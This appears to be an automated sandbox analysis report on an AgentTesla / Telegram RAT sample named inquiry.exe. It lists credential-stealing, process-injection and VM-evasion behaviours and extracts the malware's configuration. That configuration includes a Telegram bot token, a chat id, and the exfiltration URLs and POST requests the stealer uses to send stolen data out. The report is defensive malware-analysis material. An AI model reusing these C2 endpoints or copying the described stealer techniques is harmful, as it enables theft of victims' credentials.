Loading ...

Play interactive tourEdit tour

Windows Analysis Report inquiry.exe

Overview

General Information

Sample Name:inquiry.exe
Analysis ID:483914
MD5:e15248f30c0657187fbb03e46430f97a
SHA1:42b284897791f02b6b076acf13f406ffd5a4b19a
SHA256:9f2dc372685655a102ba02d121745b124d47ea7b90d0f697181fda747a26ae2e
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • inquiry.exe (PID: 4388 cmdline: 'C:\Users\user\Desktop\inquiry.exe' MD5: E15248F30C0657187FBB03E46430F97A)
    • conhost.exe (PID: 2576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\inquiry.exe' MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1717121719", "Chat URL": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.inquiry.exe.ea0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.inquiry.exe.ea0000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.inquiry.exe.ea0000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.inquiry.exe.ea0000.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    2.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.inquiry.exe.ea0000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1717121719", "Chat URL": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument"}
                      Source: inquiry.exe.4388.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: inquiry.exeVirustotal: Detection: 47%Perma Link
                      Source: inquiry.exeReversingLabs: Detection: 64%
                      Source: 2.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: inquiry.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49815 version: TLS 1.2
                      Source: inquiry.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wntdll.pdbUGP source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997Host: api.telegram.orgContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9788283298e0eHost: api.telegram.orgContent-Length: 1900Expect: 100-continue
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: MSBuild.exe, 00000002.00000002.619340495.00000000060A2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: http://tyHOrV.com
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpString found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/
                      Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocumentdocument-----
                      Source: MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4sn
                      Source: MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD8sn
                      Source: MSBuild.exe, 00000002.00000002.617344247.000000000328B000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.617328263.0000000003287000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: https://oLurbWzWRU.org
                      Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997Host: api.telegram.orgContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49815 version: TLS 1.2
                      Source: inquiry.exe, 00000000.00000002.353187849.0000000000F9A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: inquiry.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D42FE9
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D49092
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D4A871
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D49604
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D4B83D
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D4797C
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D48B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01060D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01069400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01064040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0106F2B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01066AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01062718
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01067BF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01452F58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0145AFE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01458640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_014562D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01450A40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0145EA4A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_014647A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01465471
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01463CCC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_014646B0
                      Source: inquiry.exe, 00000000.00000003.350221734.0000000002946000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inquiry.exe
                      Source: inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWvsmxvqOErTYqqafvSLdXBGos.exe4 vs inquiry.exe
                      Source: inquiry.exeVirustotal: Detection: 47%
                      Source: inquiry.exeReversingLabs: Detection: 64%
                      Source: inquiry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\inquiry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\inquiry.exe 'C:\Users\user\Desktop\inquiry.exe'
                      Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'
                      Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\dj2qhmgg.ty5Jump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@2/1
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2576:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: inquiry.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wntdll.pdbUGP source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: inquiry.exe, 00000000.00000003.350677415.00000000029C0000.00000004.00000001.sdmp
                      Source: inquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: inquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: inquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: inquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: inquiry.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D43BA5 push ecx; ret
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D42FE9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6840Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6852Thread sleep count: 483 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6852Thread sleep count: 9370 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 483
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
